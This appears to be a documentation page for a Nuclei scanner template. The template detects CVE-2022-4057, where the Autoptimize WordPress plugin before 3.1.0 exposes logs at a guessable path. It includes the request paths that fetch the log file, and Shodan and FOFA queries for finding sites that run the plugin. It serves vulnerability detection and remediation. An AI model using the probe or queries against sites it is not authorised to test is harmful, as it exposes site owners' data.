Autoptimize < 3.1.0 - Information Disclosure
ID: CVE-2022-4057
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters
Description
Section titled “Description”The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin’s exported settings and logs.
YAML Source
Section titled “YAML Source”id: CVE-2022-4057
info: name: Autoptimize < 3.1.0 - Information Disclosure author: DhiyaneshDK severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. impact: | An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af - https://wordpress.org/plugins/autoptimize/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4057 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-4057 cwe-id: CWE-425 epss-score: 0.00125 epss-percentile: 0.46949 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: optimizingmatters product: autooptimize framework: wordpress shodan-query: http.html:/wp-content/plugins/autoptimize fofa-query: body=/wp-content/plugins/autoptimize publicwww-query: /wp-content/plugins/autoptimize tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters
http: - method: GET path: - "{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html" - "{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - 'Job id <' - 'log messages' condition: and
- type: status status: - 200# digest: 4a0a00473045022100f6c9cd3777fda4e93258ffddc288e37f9fc32d54e751963a1a1a89886480507b02201f8a94621fd3d04aac71105bff695cee5074b331f5aff36f1399e6eba4689a06:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4057.yaml"